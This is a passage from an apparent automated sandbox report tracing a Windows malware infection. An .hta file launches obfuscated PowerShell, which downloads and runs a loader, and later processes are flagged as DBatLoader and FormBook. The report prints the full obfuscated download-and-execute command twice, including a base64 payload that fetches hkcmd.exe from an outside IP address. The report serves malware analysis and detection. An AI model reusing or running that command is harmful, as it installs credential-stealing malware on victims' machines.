                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vHFSdW19aDjtc6zDSyvHrTjJAHTW06gRlfaV6sl5nJic3MOTtxx4k%2FNO6rIiOgBOQKDUXkObyDZ5zDTRuNo7kuXe4kzl%2F0%2BTOcIdTHpHTVGZJabaPW0puAeAUDR3LpELaloOEJ6t34PF"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 93063f175f344f21-MIA
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=121391&min_rtt=121391&rtt_var=60695&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=757&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                            Apr 14, 2025 23:20:19.338943958 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:17:18:09
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\truelifewithmanmadethingsonherefor.hta"
                                                                                                            Imagebase:0xa50000
                                                                                                            File size:13'312 bytes
                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:17:18:09
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                                                                                                            Imagebase:0x460000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:17:18:09
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff642da0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:17:18:10
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:poWERsHElL -ex BYPass -nop -W 1 -c DEVicecrEdeNtiAldePlOYMEnt.eXe ; IEX($(IEx('[sYSteM.TEXT.EnCoDinG]'+[chAR]0X3a+[chAr]0X3A+'UTf8.GeTsTRInG([SYSTEm.cONVErt]'+[chAR]58+[ChAr]0X3a+'fromBaSE64StrIng('+[ChAR]0x22+'JDdWdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRWZpTkl0SW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV0SFUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUVoU0FyY1hldkYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1veixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqTG1IbGJtbGEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJvVU9WcWltYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWRaUlFiVWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDdWdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI2LjE0My80NDAvaGtjbWQuZXhlIiwiJEVOdjpBUFBEQVRBXGhrY21kLmV4ZSIsMCwwKTtTdEFSdC1TTEVlcCgzKTtJblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcaGtjbWQuZXhlIg=='+[ChAr]0X22+'))')))"
                                                                                                            Imagebase:0x870000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:17:18:12
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4jbortuo\4jbortuo.cmdline"
                                                                                                            Imagebase:0xcf0000
                                                                                                            File size:2'141'552 bytes
                                                                                                            MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:17:18:12
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDFBA.tmp" "c:\Users\user\AppData\Local\Temp\4jbortuo\CSC8F941E4524844CFB0E06A557A70D099.TMP"
                                                                                                            Imagebase:0xeb0000
                                                                                                            File size:46'832 bytes
                                                                                                            MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:17:18:17
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Users\user\AppData\Roaming\hkcmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\hkcmd.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:1'705'472 bytes
                                                                                                            MD5 hash:05EF4CA659965C1D3FAA58077B0F9943
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000006.00000002.980236899.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 72%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:17:18:18
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\\ProgramData\\1925.cmd
                                                                                                            Imagebase:0x460000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:17:18:18
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff642da0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:17:18:19
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c C:\\ProgramData\\34695.cmd
                                                                                                            Imagebase:0x460000
                                                                                                            File size:236'544 bytes
                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:17:18:19
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff642da0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:17:18:19
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                            Imagebase:0x7d0000
                                                                                                            File size:86'528 bytes
                                                                                                            MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1202895783.00000000073A0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1223919128.000000002C7F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:17:18:34
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\heeigF7lwUb.exe"
                                                                                                            Imagebase:0x6d0000
                                                                                                            File size:143'872 bytes
                                                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2111063541.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2116062584.0000000005D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:14
                                                                                                            Start time:17:18:36
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\systeminfo.exe"
                                                                                                            Imagebase:0x320000
                                                                                                            File size:76'800 bytes
                                                                                                            MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:15
                                                                                                            Start time:17:18:42
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                            Imagebase:0x7ff7c8b00000
                                                                                                            File size:55'320 bytes
                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:22
                                                                                                            Start time:17:19:00
                                                                                                            Start date:14/04/2025
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff67b460000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >